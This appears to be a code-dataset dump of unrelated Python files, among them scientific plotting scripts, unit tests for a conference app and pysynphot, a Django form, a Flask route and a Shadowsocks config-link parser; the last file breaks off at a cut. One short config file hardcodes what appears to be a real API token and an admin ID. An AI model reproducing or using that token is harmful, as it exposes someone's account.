index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
24,100 | 977e77cab03316df958d9057d2f92270979ec773 | from __future__ import division
import sys
import os
import unittest
import testutil
import pysynphot as S
import numpy as N
class AnalyticBP(testutil.FPTestCase):
def setUp(self):
self.bp=S.Box(10000,100)
def testbp1(self):
tst=self.bp(10000)
self.assertTrue(tst == 1.0)
def testconstant(self):
bp2 = self.bp * 3
tst = bp2(10000)
self.assertTrue(tst == 3)
def testbp2(self):
tst=self.bp(3000)
self.assertTrue(tst == 0.0)
def testbp3(self):
tst=self.bp.sample(10000)
self.assertTrue(tst == 1.0)
def testbp4(self):
tst=self.bp.sample(3000)
self.assertTrue(tst == 0.0)
def testflat(self):
self.bp = S.UniformTransmission(0.5)
tst = self.bp.sample(3000)
self.assertTrue(tst == 0.5)
class Tabular(testutil.FPTestCase):
def setUp(self):
#Make arrays
self.wv = N.arange(1000,2000)
self.fl = N.zeros(self.wv.shape)
self.fl[100:-100] = 10.0
def testsp(self):
self.sp=S.ArraySpectrum(self.wv,self.fl,
fluxunits='photlam')
tst=self.sp(1500)
self.assertTrue(tst == 10)
def testcompsp(self):
sp1=S.ArraySpectrum(self.wv,self.fl, fluxunits='photlam')
sp2=S.ArraySpectrum(self.wv[48:],self.fl[48:]*2.3,
fluxunits='photlam')
self.sp=sp1 + sp2
tst=self.sp(1500)
self.assertTrue(tst == 10+(10*2.3))
def testbp(self):
self.bp=S.ArrayBandpass(self.wv,self.fl)
tst=self.bp(1500)
self.assertTrue(tst == 10)
class TestDoesntError(unittest.TestCase):
#Just test to make sure it doesn't raise an exception;
#don't test that the actual value is correct
def testobsband(self):
self.bp=S.ObsBandpass('acs,hrc,f555w')
tst=self.bp(3000)
assert True
def testicat(self):
self.sp=S.Icat('k93models',4500,1,2)
tst=self.sp(3000)
assert True
|
24,101 | ef6506bebf6a7f968022381c98fed9ec22f83cb2 | #!/usr/bin/python
def outlierCleaner(predictions, ages, net_worths):
"""
clean away the 10% of points that have the largest
residual errors (different between the prediction
and the actual net worth)
return a list of tuples named cleaned_data where
each tuple is of the form (age, net_worth, error)
"""
cleaned_data = []
### your code goes here
temp = abs(predictions-net_worths)
for k in range(len(ages)):
cleaned_data.append((ages[k][0],net_worths[k][0],temp[k][0]))
cleaned_data = sorted(cleaned_data, key=lambda data:data[2])
print("Length: ", len(cleaned_data))
cleaned_data = cleaned_data[:len(cleaned_data)-9]
print("Length: ", len(cleaned_data))
return cleaned_data
|
24,102 | 665b27722263738122d67ca56a46317fe5d6d798 | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 15 14:17:07 2018
@author: phosp
"""
import numpy as np
import pandas as pd
import random
import cv2
from pathlib import Path
from tracking_cop_movement import get_random_images, find_wells
# get video info
video_tbl = pd.read_csv("video_tbl/video_table_drop.csv")
# get wells to track for each plate
wells_to_track = pd.read_csv("wells_to_track.csv")
# get list of all mov files
cwd = Path.cwd()
vid_path = cwd.parent/"GxG_videos/day5/pl1_day5.mov"
vid = str(vid_path)
fname = Path(vid_path).name # file name
r_vid_tbl = video_tbl[video_tbl.file_name == fname] # match file name in vid table
plate = r_vid_tbl.iloc[0]['plate']
day = r_vid_tbl.iloc[0]['day']
tot_frames = r_vid_tbl.iloc[0]['frames']
vid_width = r_vid_tbl.iloc[0]['width']
vid_height = r_vid_tbl.iloc[0]['height']
drop = int(r_vid_tbl.iloc[0]['drop'])
tracked = r_vid_tbl.iloc[0]['tracked']
rand_imgs_before, rand_imgs_after = get_random_images(vid, tot_frames, drop, 50)
wells_before = find_wells(rand_imgs_before)
def find_copepod(binary_frame):
'''
Take in binary image, returns the identified blobs.
Parameters set to find moving cop, i.e. when it is in foreground not background.
Returns whether cop was found, x-y coordinates, cop size, and number of blobs identified.
Helper in the track_copepod functions.
'''
# setup blob detector parameters.
params = cv2.SimpleBlobDetector_Params()
# threshold from black to white
params.minThreshold = 0;
params.maxThreshold = 255;
# only blobs bigger than 10 pixels area, does not avoid all noise
params.filterByArea = True
params.minArea = 10
# create a detector with the parameters
ver = (cv2.__version__).split('.')
if int(ver[0]) < 3 :
detector = cv2.SimpleBlobDetector(params)
else :
detector = cv2.SimpleBlobDetector_create(params)
# use detector
keypoints = detector.detect(binary_frame)
blobs = len(keypoints)
cop_found = blobs > 0
# if cop found, extract data
if cop_found:
(x,y), cop_qual = keypoints[0].pt, keypoints[0].size
x,y = round(x, 2), round(y,2)
else:
x,y,cop_qual = None,None,None
return(cop_found, x, y, cop_qual, blobs)
def track_copepod_before(well, video, wells_vec, drop, vid_width, vid_height):
# create masks to isolate the well
x, y = np.meshgrid(np.arange(vid_width), np.arange(vid_height))
xc, yc, rad = wells_vec[well]
d2 = (x - xc)**2 + (y - yc)**2
mask_before = d2 > rad**2
# open video
cap = cv2.VideoCapture(video)
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('vids/demo.mp4',fourcc, 32, (vid_width, vid_height))
# model for background subtraction
fgbg = cv2.createBackgroundSubtractorMOG2(history = 500,detectShadows = False)
# run through video once to 'train' background model
cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
while(cap.isOpened()):
frame_n = cap.get(cv2.CAP_PROP_POS_FRAMES)
ret, frame = cap.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame[mask_before] = 0
frame = fgbg.apply(frame)
if frame_n >= drop:
break
# reset at initial frame
cap.set(cv2.CAP_PROP_POS_FRAMES, 0)
ret, old_frame = cap.read()
old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)
old_gray[mask_before] = 0
old_gray = fgbg.apply(old_gray)
old_gray = cv2.bitwise_not(old_gray) # makes binary
# output initial data
cop_found, xp, yp, cop_qual, blobs = find_copepod(old_gray)
out_array = np.array([[0, xp, yp, blobs, cop_qual]])
while(cap.isOpened()):
frame_n = cap.get(cv2.CAP_PROP_POS_FRAMES)
ret, frame = cap.read()
if frame_n < 150:
out.write(frame)
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
elif frame_n < drop:
# convert frame to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray[mask_before] = 0
frame[mask_before] = 0
gray = fgbg.apply(gray)
gray = cv2.bitwise_not(gray)
# find a copepod
cop_found, xc, yc, cop_qual, blobs = find_copepod(gray)
if cop_found:
# make a row of data
out_row = np.array([frame_n, xc, yc, blobs, cop_qual])
# draw circle around cop
cv2.circle(frame,(int(xc),int(yc)),4,(0,0,255), 2)
# reassign cop coord if it was found (moving)
xp, yp = xc, yc
else:
# if cop not found, use x-y coord from previous frame
out_row = np.array([frame_n, xp, yp, blobs, cop_qual])
if xp is not None:
cv2.circle(frame,(int(xp),int(yp)),4,(255,0,0), 2)
# create output array, frame-by-frame
out_array = np.append(out_array, [out_row], axis = 0)
out.write(frame)
cv2.imshow('frame', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
# close video, return dataframe
cap.release()
out.release()
cv2.destroyAllWindows()
return(pd.DataFrame(out_array, columns = ['frame', 'x', 'y', 'blobs', 'blob_size']))
track_copepod_before(13,vid,wells_before,drop,vid_width,vid_height)
|
24,103 | e637f99380224f0f5e4449d3b980a052d7dc987c | #API Token
API_TOKEN = 'e6712695b71871ce41b32cfe99ffce6505ca650a'
#Admin ID
admin_id = 444795295
|
24,104 | 300ba3d45e38bfbd238b1bdcf833b5ad28db12a7 | from django import forms
from .models import ParkingLot
class ParkingLotForm(forms.ModelForm):
class Meta:
model = ParkingLot
fields = (
'address',
'owner',
'address',
'time',
'tel',
'price',
'photo',
)
|
24,105 | 5ef06b6c5ea2c27a0b84c2f62f50ef5094b108c6 | ii = [('AubePRP2.py', 1), ('PeckJNG.py', 1), ('CarlTFR.py', 1), ('GilmCRS.py', 1), ('HowiWRL2.py', 1), ('MartHSI.py', 1), ('EvarJSP.py', 1)] |
24,106 | 5c6369a40bf909804fca2f6f35b98df272ff624e | from tkinter import *
from tkinter import ttk
from app import *
import boot
import database
DATABASE_PATH = ''
BACKUP_PATH = ''
def main():
# boot
db = boot.boot()
# Run the app
app = App(db)
app.mainloop()
db.csv_update()
if __name__ == "__main__":
main() |
24,107 | 894a4930c48fdff443ba98f0303c7b5a354d4556 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib import animation
from scipy.optimize import curve_fit
from pylab import cm as plcm # colors for plotting
import pickle # for storing calculations and reading again while editing plot details
plt.rcParams.update({'font.size': 14})
# ------------------------- Set global values
nToExamine = [5,10] # assignment
nArray = [n for n in range(2,30)] # range to find dependence on n
tolerance = 0.01 # max relatice error from exact solution
stepsToToleranceArray1 = [1, 3, 5, 8, 10, 14, 18, 23, 29,
35, 41, 48, 56, 64, 73, 82, 92,
103, 113, 125, 137, 150, 163,
177, 191, 206, 222, 238]
stepsToToleranceArray2 = [1, 4, 8, 13, 20, 26, 35, 44,
56, 67, 81, 94, 110, 126, 144,
162, 182, 203, 225, 248, 272,
297, 324, 352, 381, 410, 442, 473]
# ------------------------- Define functions
def initiateVMatrixes():
"""Initiates potential matrixes.
- v has boundary values and initial guess of 9 everywhere else
- vNew is a copy of v
- vExact is the exact analytical solution, 10 everywhere"""
global v, vNew, vExact
# Initialize the grid to 0
v = np.zeros((n+1, n+1)) # matrix of v, index are i: row, j:column
# Set the boundary conditions
for i in range(1,n):
v[0,i] = 10
v[n,i] = 10
v[i,0] = 10
v[i,n] = 10
# Exact solution
vExact = np.copy(v)
for i in range(1,n):
for j in range(1,n):
vExact[i,j] = 10
# Initial guess
for i in range(1,n):
for j in range(1,n):
v[i,j] = 0.9*vExact[i,j]
vNew = np.copy(v)
def relax_checker():
"""One checker-relax iteration. v[i,j] is set as the avarage of its neighbours."""
checker = 2
global v, vNew, n
for check in range(0,2):
for x in range(1,n):
for y in range(1,n):
if (x*(n+1) + y) % 2 == check:
v[x,y] = (v[x-1][y] + v[x+1][y] + v[x][y-1] + v[x][y+1])*0.25
def calculate():
"""Main calculation function that first initalizes with initiateVMatrixes()
and then uses relax() until v is within tolerance.
1. Iterate for n = 5, 10
2. Iterate for the range of n in nArray"""
global v, vNew, n, stepsToToleranceArray
stepsToToleranceArray = []
for n in nArray:
print('Currently working with n = ', n)
initiateVMatrixes()
step = 0
toleranceAcqurired = False
while not toleranceAcqurired:
step+=1
relax_checker()
# Controll accuracy
toleranceAcqurired = True # run through v and set false if not acquired
for i in range(1,n):
for j in range(1,n):
if np.abs( (v[i,j]-vExact[i,j])/vExact[i,j] ) > tolerance:
toleranceAcqurired = False
if toleranceAcqurired:
stepsToToleranceArray.append(step)
if n in [5,10]: print('n =', n, 'steps =', step)
# ----------------------- Main
calculate() # comment to obly load data
# ----------------------- Plot
# common plot values
commonLinewidth = 2
plt.figure() # linear plot
plt.plot(nArray, stepsToToleranceArray,
linewidth = commonLinewidth,
linestyle = '--',
marker = '.',
markersize = 8,
color = 'tab:cyan',
zorder = 2)
plt.plot(nArray, stepsToToleranceArray1,
linewidth = commonLinewidth,
linestyle = '-',
marker = 'x',
markersize = 8,
color = 'tab:blue',
zorder = 1)
plt.plot(nArray, stepsToToleranceArray2,
linewidth = commonLinewidth,
marker = '.',
markersize = 8,
color = 'b',
zorder = 0)
plt.title(r'Steps required to reach tolerance', fontsize = 18)
plt.legend(['Checker relaxation', 'Gauss-Seidel', 'Relaxation method'])
plt.ylabel('Relaxations', fontsize = 18)
plt.xlabel('Grid size (n)', fontsize = 18 )
plt.show()
plt.figure() # loglog plot
# calculate regression from n = 10 and up
log_nArray = [np.log(n) for n in nArray]
log_stepsToToleranceArray = [np.log(steps) for steps in stepsToToleranceArray]
def f(x,k,m):
return k*x+m
[k,m], _ = curve_fit(f, log_nArray[10:], log_stepsToToleranceArray[10:])
# plot loglog with regression
plt.loglog(nArray, [np.e**f(x,k,m) for x in log_nArray],
linewidth = commonLinewidth,
linestyle = '--',
zorder = 3,
color = 'r')
plt.loglog(nArray, stepsToToleranceArray,
linewidth = commonLinewidth,
color = 'tab:red',
marker = '.',
markersize = 8)
plt.legend(['Computarional data', r'log(f(n))$ = %s \, \log(n) - %s$'%(round(k,3), round(np.abs(m),3))],
fancybox = True)
plt.title('Relaxations for tolerance (log-log)', fontsize = 18)
plt.ylabel('Relaxations', fontsize = 18)
plt.xlabel('Grid size (n)', fontsize = 18)
plt.show()
|
24,108 | 85ce90891d5455a3e9f5627c57865ce63ddda17b | from flask import request
from routes.main import MainRoute
class TimerRoute(MainRoute):
def __init__(self):
super().__init__()
def _generate_response(self, input_data=None):
return super()._generate_response(input_data)
def get(self):
var = open('time.txt','r')
my_time = var.readline()
var.close()
return self._generate_response(my_time)
def post(self):
act = request.form['time']
var = open('time.txt','w')
var.write(act)
var.close()
return self._generate_response(act)
def get_route(self):
return '/timer' |
24,109 | 58910f5fa2d7dd7d44dc79519769cfbb70a5c569 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 6 22:58:05 2020
@author: prisc
"""
#1 IMPORT AND PREPARE THE DATA
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import time
data = pd.read_csv('data.csv')
#print (data.head())
#print (data.columns)
y = data.diagnosis #storing diagnosis data
cols_to_drop = ['Unnamed: 32', 'id', 'diagnosis']
x = data.drop(cols_to_drop, axis = 1)
print (y.head())
print (x.head())
#2 PLOT THE DATA
ax = sns.countplot(y, label="Count")
B, M = y.value_counts()
print ('Benign Tumors: ', B)
print ('Malignant Tumors: ', M)
print (x.describe())
#3 STANDARDIZING THE DATA AND VISUALIZE TO SELECT THE FEATURES
data = x
standardized_data = (data - data.mean()) / data.std() #to standardized the data
data = pd.concat([y, standardized_data.iloc[:, 0:10]], axis = 1)
data = pd.melt(data, id_vars='diagnosis',
var_name='features',
value_name='value')
plt.figure(figsize = (10, 10))
sns.violinplot(x = 'features',
y = 'value',
hue = 'diagnosis',
data = data,
split = True,
inner = 'quart') #good for visualizing distributions
plt.xticks(rotation = 90)
plt.show()
sns.boxplot(x = 'features',
y = 'value',
hue = 'diagnosis',
data = data)
plt.xticks(rotation = '90')
plt.show()
#sns.jointplot(x.loc[:, 'concavity_mean'],
# x.loc[:, 'concave points_mean'],
# kind = 'regg',) #to compare two features if they're correlated
sns.set(style = 'whitegrid', palette = 'muted')
sns.swarmplot(x = 'features',
y = 'value',
hue = 'diagnosis',
data = data)
plt.xticks(rotation = 90)
plt.show()
f, ax = plt.subplots(figsize = (15, 15))
sns.heatmap(x.corr(),
annot = True,
linewidth = .5,
fmt = '.1f',
ax = ax)
|
24,110 | 1f63250de935902c25a33b85a831d9a0a26dffd3 | # Copyright (c) 2011-2022 Berkeley Model United Nations. All rights reserved.
# Use of this source code is governed by a BSD License (see LICENSE).
from collections import OrderedDict
from huxley.accounts.models import User
from huxley.api import tests
from huxley.api.tests import auto
from huxley.utils.test import models
class AssignmentDetailGetTestCase(auto.RetrieveAPIAutoTestCase):
url_name = 'api:assignment_detail'
@classmethod
def get_test_object(cls):
return models.new_assignment()
def test_anonymous_user(self):
self.do_test(expected_error=auto.EXP_NOT_AUTHENTICATED)
def test_advisor(self):
self.as_user(self.object.registration.school.advisor).do_test()
def test_chair(self):
chair = models.new_user(user_type=User.TYPE_CHAIR)
self.as_user(chair).do_test(expected_error=auto.EXP_PERMISSION_DENIED)
def test_delegate(self):
delegate_1 = models.new_user(user_type=User.TYPE_DELEGATE)
self.as_user(delegate_1).do_test(
expected_error=auto.EXP_PERMISSION_DENIED)
assigned_delegate = models.new_delegate(assignment=self.object)
delegate_2 = models.new_user(
user_type=User.TYPE_DELEGATE, delegate=assigned_delegate)
self.as_user(delegate_2).do_test()
def test_superuser(self):
self.as_superuser().do_test()
class AssignmentDetailPutTestCase(tests.UpdateAPITestCase):
url_name = 'api:assignment_detail'
params = {'rejected': True}
def setUp(self):
self.advisor = models.new_user(username='advisor', password='advisor')
self.school = models.new_school(user=self.advisor)
self.registration = models.new_registration(school=self.school)
self.chair = models.new_user(
username='chair', password='chair', user_type=User.TYPE_CHAIR)
self.committee = models.new_committee(user=self.chair)
self.assignment = models.new_assignment(
committee=self.committee, registration=self.registration)
self.delegate_user = models.new_user(
username='delegate',
password='delegate',
user_type=User.TYPE_DELEGATE)
self.delegate = models.new_delegate(
user=self.delegate_user,
school=self.school,
assignment=self.assignment)
def test_anonymous_user(self):
'''Unauthenticated users shouldn't be able to update assignments.'''
response = self.get_response(self.assignment.id, params=self.params)
self.assertNotAuthenticated(response)
def test_advisor(self):
'''It should return correct data.'''
self.client.login(username='advisor', password='advisor')
response = self.get_response(self.assignment.id, params=self.params)
self.assertEqual(response.data, {
"id": self.assignment.id,
"committee": self.assignment.committee.id,
"country": self.assignment.country.id,
"registration": self.registration.id,
"paper": OrderedDict(
[('id', self.assignment.paper.id),
('file', self.assignment.paper.file),
('graded_file', self.assignment.paper.graded_file),
('graded', self.assignment.paper.graded),
('score_1', self.assignment.paper.score_1),
('score_2', self.assignment.paper.score_2),
('score_3', self.assignment.paper.score_3),
('score_4', self.assignment.paper.score_4),
('score_5', self.assignment.paper.score_5),
('score_t2_1', self.assignment.paper.score_t2_1),
('score_t2_2', self.assignment.paper.score_t2_2),
('score_t2_3', self.assignment.paper.score_t2_3),
('score_t2_4', self.assignment.paper.score_t2_4),
('score_t2_5', self.assignment.paper.score_t2_5),
("submission_date", self.assignment.paper.submission_date)]),
"rejected": True,
})
def test_chair(self):
'''Chairs should not be able to update assignments'''
self.client.login(username='chair', password='chair')
response = self.get_response(self.assignment.id, params=self.params)
self.assertPermissionDenied(response)
def test_delegate(self):
'''Delegates should not be able to update assignments'''
self.client.login(username='delegate', password='delegate')
response = self.get_response(self.assignment.id, params=self.params)
self.assertPermissionDenied(response)
def test_superuser(self):
'''It should return correct data.'''
superuser = models.new_superuser(username='s_user', password='s_user')
self.client.login(username='s_user', password='s_user')
response = self.get_response(self.assignment.id)
self.assertEqual(response.data, {
"id": self.assignment.id,
"committee": self.assignment.committee.id,
"country": self.assignment.country.id,
"registration": self.registration.id,
"paper": OrderedDict(
[('id', self.assignment.paper.id),
('file', self.assignment.paper.file),
('graded_file', self.assignment.paper.graded_file),
('graded', self.assignment.paper.graded),
('score_1', self.assignment.paper.score_1),
('score_2', self.assignment.paper.score_2),
('score_3', self.assignment.paper.score_3),
('score_4', self.assignment.paper.score_4),
('score_5', self.assignment.paper.score_5),
('score_t2_1', self.assignment.paper.score_t2_1),
('score_t2_2', self.assignment.paper.score_t2_2),
('score_t2_3', self.assignment.paper.score_t2_3),
('score_t2_4', self.assignment.paper.score_t2_4),
('score_t2_5', self.assignment.paper.score_t2_5),
("submission_date", self.assignment.paper.submission_date)]),
"rejected": True,
})
class AssignmentDetailPatchTestCase(tests.PartialUpdateAPITestCase):
url_name = 'api:assignment_detail'
params = {'rejected': True}
def setUp(self):
self.advisor = models.new_user(username='advisor', password='advisor')
self.school = models.new_school(user=self.advisor)
self.registration = models.new_registration(school=self.school)
self.chair = models.new_user(
username='chair', password='chair', user_type=User.TYPE_CHAIR)
self.committee = models.new_committee(user=self.chair)
self.assignment = models.new_assignment(
committee=self.committee, registration=self.registration)
self.delegate_user = models.new_user(
username='delegate',
password='delegate',
user_type=User.TYPE_DELEGATE)
self.delegate = models.new_delegate(
user=self.delegate_user,
school=self.school,
assignment=self.assignment)
def test_anonymous_user(self):
'''Unauthenticated users shouldn't be able to update assignments.'''
response = self.get_response(self.assignment.id, params=self.params)
self.assertNotAuthenticated(response)
def test_advisor(self):
'''It should return correct data.'''
self.client.login(username='advisor', password='advisor')
response = self.get_response(self.assignment.id, params=self.params)
self.assertEqual(response.data, {
"id": self.assignment.id,
"committee": self.assignment.committee.id,
"country": self.assignment.country.id,
"registration": self.registration.id,
"paper": OrderedDict(
[('id', self.assignment.paper.id),
('file', self.assignment.paper.file),
('graded_file', self.assignment.paper.graded_file),
('graded', self.assignment.paper.graded),
('score_1', self.assignment.paper.score_1),
('score_2', self.assignment.paper.score_2),
('score_3', self.assignment.paper.score_3),
('score_4', self.assignment.paper.score_4),
('score_5', self.assignment.paper.score_5),
('score_t2_1', self.assignment.paper.score_t2_1),
('score_t2_2', self.assignment.paper.score_t2_2),
('score_t2_3', self.assignment.paper.score_t2_3),
('score_t2_4', self.assignment.paper.score_t2_4),
('score_t2_5', self.assignment.paper.score_t2_5),
("submission_date", self.assignment.paper.submission_date)]),
"rejected": True,
})
def test_chair(self):
'''Chairs should not be able to update assignments'''
self.client.login(username='chair', password='chair')
response = self.get_response(self.assignment.id, params=self.params)
self.assertPermissionDenied(response)
def test_delegate(self):
'''Delegates should not be able to update assignments'''
self.client.login(username='delegate', password='delegate')
response = self.get_response(self.assignment.id, params=self.params)
self.assertPermissionDenied(response)
def test_superuser(self):
'''It should return correct data.'''
superuser = models.new_superuser(username='s_user', password='s_user')
self.client.login(username='s_user', password='s_user')
response = self.get_response(self.assignment.id)
self.assertEqual(response.data, {
"id": self.assignment.id,
"committee": self.assignment.committee.id,
"country": self.assignment.country.id,
"registration": self.registration.id,
"paper": OrderedDict(
[('id', self.assignment.paper.id),
('file', self.assignment.paper.file),
('graded_file', self.assignment.paper.graded_file),
('graded', self.assignment.paper.graded),
('score_1', self.assignment.paper.score_1),
('score_2', self.assignment.paper.score_2),
('score_3', self.assignment.paper.score_3),
('score_4', self.assignment.paper.score_4),
('score_5', self.assignment.paper.score_5),
('score_t2_1', self.assignment.paper.score_t2_1),
('score_t2_2', self.assignment.paper.score_t2_2),
('score_t2_3', self.assignment.paper.score_t2_3),
('score_t2_4', self.assignment.paper.score_t2_4),
('score_t2_5', self.assignment.paper.score_t2_5),
("submission_date", self.assignment.paper.submission_date)]),
"rejected": True,
})
class AssignmentDetailDeleteTestCase(auto.DestroyAPIAutoTestCase):
url_name = 'api:assignment_detail'
@classmethod
def get_test_object(cls):
return models.new_assignment()
def test_anonymous_user(self):
'''Anonymous users cannot delete assignments.'''
self.do_test(expected_error=auto.EXP_NOT_AUTHENTICATED)
def test_advisor(self):
'''Advisors cannot delete their assignments.'''
self.as_user(self.object.registration.school.advisor).do_test(
expected_error=auto.EXP_DELETE_NOT_ALLOWED)
def test_chair(self):
'''Chairs cannot delete their assignments.'''
chair = models.new_user(user_type=User.TYPE_CHAIR)
self.as_user(chair).do_test(expected_error=auto.EXP_PERMISSION_DENIED)
def test_delegate(self):
'''Delegates cannot delete their assignment.'''
delegate_user = models.new_user(user_type=User.TYPE_DELEGATE)
self.as_user(delegate_user).do_test(
expected_error=auto.EXP_PERMISSION_DENIED)
def test_other_user(self):
'''A user cannot delete another user's assignments.'''
models.new_school(user=self.default_user)
self.as_default_user().do_test(
expected_error=auto.EXP_PERMISSION_DENIED)
def test_superuser(self):
'''A superuser cannot delete assignments.'''
self.as_superuser().do_test(expected_error=auto.EXP_DELETE_NOT_ALLOWED)
class AssignmentListCreateTestCase(tests.CreateAPITestCase):
url_name = 'api:assignment_list'
params = {'rejected': True}
def setUp(self):
self.advisor = models.new_user(username='advisor', password='advisor')
self.chair = models.new_user(
username='chair', password='chair', user_type=User.TYPE_CHAIR)
self.school = models.new_school(user=self.advisor)
self.registration = models.new_registration(school=self.school)
self.committee = models.new_committee(user=self.chair)
self.country = models.new_country()
self.delegate_user = models.new_user(
username='delegate',
password='delegate',
user_type=User.TYPE_DELEGATE)
self.params['committee'] = self.committee.id
self.params['registration'] = self.registration.id
self.params['country'] = self.country.id
def test_anonymous_user(self):
'''Anonymous Users should not be able to create assignments.'''
response = self.get_response(params=self.params)
self.assertNotAuthenticated(response)
def test_advisor(self):
'''Advisors should not be able to create Assignments.'''
self.client.login(username='advisor', password='advisor')
response = self.get_response(params=self.params)
self.assertPermissionDenied(response)
def test_chair(self):
'''Chairs should not be able to create Assignments'''
self.client.login(username='chair', password='chair')
response = self.get_response(params=self.params)
self.assertPermissionDenied(response)
def test_delegate(self):
'''Delegates should not be able to create Assignments'''
self.client.login(username='delegate', password='delegate')
response = self.get_response(params=self.params)
self.assertPermissionDenied(response)
def test_superuser(self):
'''Superusers should be able to create assignments.'''
models.new_superuser(username='s_user', password='s_user')
self.client.login(username='s_user', password='s_user')
response = self.get_response(params=self.params)
response.data.pop('id')
response.data.pop('paper')
self.assertEqual(response.data, {
"committee": self.committee.id,
"country": self.country.id,
"registration": self.registration.id,
"rejected": True,
})
class AssignmentListGetTestCase(tests.ListAPITestCase):
url_name = 'api:assignment_list'
def setUp(self):
self.advisor = models.new_user(username='advisor', password='advisor')
self.chair = models.new_user(
username='chair', password='chair', user_type=User.TYPE_CHAIR)
self.delegate_user = models.new_user(
username='delegate',
password='delegate',
user_type=User.TYPE_DELEGATE)
self.school = models.new_school(user=self.advisor)
self.registration = models.new_registration(school=self.school)
self.committee = models.new_committee(user=self.chair)
self.a1 = models.new_assignment(
registration=self.registration, committee=self.committee)
self.a2 = models.new_assignment(
registration=self.registration, committee=self.committee)
self.a3 = models.new_assignment()
def test_anonymous_user(self):
'''It rejects a request from an anonymous user.'''
response = self.get_response()
self.assertNotAuthenticated(response)
response = self.get_response(params={'school_id': self.school.id})
self.assertNotAuthenticated(response)
def test_advisor(self):
'''It returns the assignments for the school's advisor.'''
self.client.login(username='advisor', password='advisor')
response = self.get_response()
self.assertPermissionDenied(response)
response = self.get_response(params={'school_id': self.school.id})
self.assert_assignments_equal(response, [self.a1, self.a2])
def test_chair(self):
'''It returns the assignments associated with the chair's committee'''
self.client.login(username='chair', password='chair')
response = self.get_response()
self.assertPermissionDenied(response)
response = self.get_response(
params={'committee_id': self.committee.id})
self.assert_assignments_equal(response, [self.a1, self.a2])
def test_delegate(self):
'''Delegates cannot access assignments in bulk.'''
self.client.login(username='delegate', password='delegate')
response = self.get_response()
self.assertPermissionDenied(response)
def test_other_user(self):
'''It rejects a request from another user.'''
user2 = models.new_user(username='another', password='user')
models.new_school(user=user2)
self.client.login(username='another', password='user')
response = self.get_response()
self.assertPermissionDenied(response)
response = self.get_response(params={'school_id': self.school.id})
self.assertPermissionDenied(response)
def test_superuser(self):
'''It returns the assignments for a superuser.'''
models.new_superuser(username='test', password='user')
self.client.login(username='test', password='user')
response = self.get_response()
self.assert_assignments_equal(response, [self.a1, self.a2, self.a3])
response = self.get_response(params={'school_id': self.school.id})
self.assert_assignments_equal(response, [self.a1, self.a2])
def assert_assignments_equal(self, response, assignments):
'''Assert that the response contains the assignments in order.'''
self.assertEqual(response.data, [{
'id': a.id,
'country': a.country_id,
'committee': a.committee_id,
'registration': a.registration_id,
"paper": OrderedDict(
[('id', a.paper.id), ('file', a.paper.file),
('graded_file', a.paper.graded_file),
('graded', a.paper.graded), ('score_1', a.paper.score_1),
('score_2', a.paper.score_2), ('score_3', a.paper.score_3),
('score_4', a.paper.score_4), ('score_5', a.paper.score_5),
('score_t2_1', a.paper.score_t2_1),
('score_t2_2', a.paper.score_t2_2),
('score_t2_3', a.paper.score_t2_3),
('score_t2_4', a.paper.score_t2_4),
('score_t2_5', a.paper.score_t2_5),
('submission_date', a.paper.submission_date)]),
'rejected': a.rejected,
} for a in assignments])
|
24,111 | ad32ed60bf457ca2edc7621f7c5cd31ee9ea1bdd | #!/usr/bin/python
#coding=utf-8
import base64
def add_equal(string):
"""
base64编码补全,补=
"""
missing_padding = 4 - len(string) % 4
if missing_padding:
string += "="*missing_padding
return string
def parse_ss(ss):
result_ss = {
"ip":"",
"port":None,
"method":"",
"passwd":"",
"protocol":"origin",
"obfs":"plain",
"type":"ss"
}
left,right = ss.split("@")[0],ss.split("@")[1]
result_ss["ip"],result_ss["port"] = right.split(":")[0],right.split(":")[1]
result_ss["method"], result_ss["passwd"] = left.split(":")[0],left.split(":")[1]
return result_ss
def parse_ssr(ssr):
result_ssr = {
"ip":"",
"port":None,
"method":"",
"passwd":"",
"protocol":"",
"obfs":"",
"type":"ssr"
}
left = ssr.split("/?")[0]
result_ssr["ip"] = left.split(":")[0]
result_ssr["port"] = left.split(":")[1]
result_ssr["protocol"] = left.split(":")[2]
result_ssr["method"] = left.split(":")[3]
result_ssr["obfs"] = left.split(":")[4]
result_ssr["passwd"] = base64.b64decode(add_equal(left.split(":")[5]).replace('-','+').replace('_','/'))
return (result_ssr)
def getConfig(s):
temp = s.split("://")
config_type = temp[0]
# 解码前把字符串中包含的 – 和 _ 字符,分别替换为 + 和 /
config_info_base64 = add_equal(temp[1])
try:
config_info = base64.b64decode(config_info_base64.replace('-','+').replace('_','/'))
except Exception as e:
print(str(e))
else:
#print(config_info)
if (len(config_type) == 2 and config_type == "ss"):
config = parse_ss(config_info)
return config
elif (len(config_type) == 3 and config_type == "ssr"):
config = parse_ssr(config_info)
return config
def makeConfig(d):
config_type = d['type']
if (len(config_type) == 2 and config_type == "ss"):
config_file = d['method'] + ":" + d['passwd'] + "@" + d['ip'] + ":" + d['port']
# print(config_file)
config_file_base64 = base64.b64encode(config_file)
return "ss://"+config_file_base64
if (len(config_type) == 3 and config_type == "ssr"):
passwd_base64 = base64.b64encode(d['passwd'])
config_file = d['ip'] + ":" + d['port'] + ":" + d['protocol'] + ":" + d['method'] + ":" + d['obfs'] + ":" + passwd_base64 + "/?obfsparam=&protoparam=&remarks=&group=&udpport=0&uot=0"
# print(config_file)
config_file_base64 = base64.b64encode(config_file)
return "ssr://"+config_file_base64.strip('=')
if __name__ == "__main__":
